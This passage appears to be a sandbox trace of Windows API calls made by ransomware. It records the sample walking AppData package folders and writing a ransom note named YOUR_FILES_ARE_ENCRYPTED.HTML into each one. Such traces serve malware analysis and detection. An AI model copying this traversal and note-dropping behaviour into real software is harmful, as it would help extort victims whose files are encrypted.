0x626878 [0120.495] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13cd4a2e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13cd4a2e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13cd4a2e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName="..", cAlternateFileName="")) returned 1 [0120.495] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13cd4a2e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13cd4a2e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13cd4a2e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName="..", cAlternateFileName="")) returned 0 [0120.495] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0120.495] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0120.495] GetProcessHeap () returned 0x600000 [0120.495] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.495] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.496] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.496] CloseHandle (hObject=0x324) returned 1 [0120.497] GetProcessHeap () returned 0x600000 [0120.497] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.497] GetProcessHeap () returned 0x600000 [0120.497] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.497] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13cae82b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13cae82b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13cae82b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0120.497] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.497] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\TempState") returned 94 [0120.497] GetProcessHeap () returned 0x600000 [0120.497] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.497] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\TempState" [0120.497] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\TempState\\*" [0120.497] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13cae82b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13cae82b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13cae82b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName=".", cAlternateFileName="")) returned 0x626778 [0120.497] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13cae82b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13cae82b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13cae82b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName="..", cAlternateFileName="")) returned 1 [0120.497] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13cae82b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13cae82b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13cae82b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName="..", cAlternateFileName="")) returned 0 [0120.497] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0120.497] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0120.497] GetProcessHeap () returned 0x600000 [0120.497] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.497] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.498] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.499] CloseHandle (hObject=0x324) returned 1 [0120.499] GetProcessHeap () returned 0x600000 [0120.499] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.499] GetProcessHeap () returned 0x600000 [0120.499] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.499] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13cae82b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13cae82b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13cae82b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0120.499] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.499] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0120.499] GetProcessHeap () returned 0x600000 [0120.499] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3106fd8 [0120.499] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0120.500] WriteFile (in: hFile=0x214, lpBuffer=0x3106fd8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3106fd8*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0120.501] CloseHandle (hObject=0x214) returned 1 [0120.501] GetProcessHeap () returned 0x600000 [0120.501] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.501] GetProcessHeap () returned 0x600000 [0120.501] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0120.502] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1064efd6, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x107a63d9, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x10ea74b0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.WindowsPhone_8wekyb3d8bbwe", cAlternateFileName="MI7D5A~1.WIN")) returned 1 [0120.502] StrStrIW (lpFirst="Microsoft.WindowsPhone_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.502] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe") returned 85 [0120.502] GetProcessHeap () returned 0x600000 [0120.502] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0120.503] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe" [0120.503] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\*" [0120.503] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1064efd6, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x107a63d9, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x10ea74b0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0120.508] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1064efd6, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x107a63d9, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x10ea74b0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0120.514] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x107a63d9, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x107a63d9, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x107cc642, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0120.514] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.514] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC") returned 88 [0120.514] GetProcessHeap () returned 0x600000 [0120.514] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.515] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC" [0120.515] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\*" [0120.515] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x107a63d9, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x107a63d9, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x107cc642, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.517] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x107a63d9, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x107a63d9, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x107cc642, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName="..", cAlternateFileName="")) returned 1 [0120.517] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x107cc642, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x107cc642, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x107cc642, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0120.518] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.518] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache") returned 98 [0120.518] GetProcessHeap () returned 0x600000 [0120.518] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.519] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache" [0120.519] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache\\*" [0120.519] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x107cc642, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x107cc642, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x107cc642, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da9d8, dwReserved1=0x62f568, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.519] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x107cc642, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x107cc642, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x107cc642, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da9d8, dwReserved1=0x62f568, cFileName="..", cAlternateFileName="")) returned 1 [0120.519] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x107cc642, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x107cc642, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x107cc642, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da9d8, dwReserved1=0x62f568, cFileName="..", cAlternateFileName="")) returned 0 [0120.519] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.519] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0120.519] GetProcessHeap () returned 0x600000 [0120.519] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.520] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.520] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.522] CloseHandle (hObject=0x324) returned 1 [0120.522] GetProcessHeap () returned 0x600000 [0120.522] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.522] GetProcessHeap () returned 0x600000 [0120.522] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.522] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x107cc642, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x107cc642, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x107cc642, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0120.522] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.522] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCookies") returned 100 [0120.522] GetProcessHeap () returned 0x600000 [0120.522] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.522] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCookies" [0120.522] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0120.522] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x107cc642, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x107cc642, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x107cc642, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da9d8, dwReserved1=0x62f568, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0120.522] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x107cc642, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x107cc642, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x107cc642, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da9d8, dwReserved1=0x62f568, cFileName="..", cAlternateFileName="")) returned 1 [0120.522] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x107cc642, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x107cc642, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x107cc642, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da9d8, dwReserved1=0x62f568, cFileName="..", cAlternateFileName="")) returned 0 [0120.522] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0120.522] wnsprintfW (in: pszDest=0x313b008, 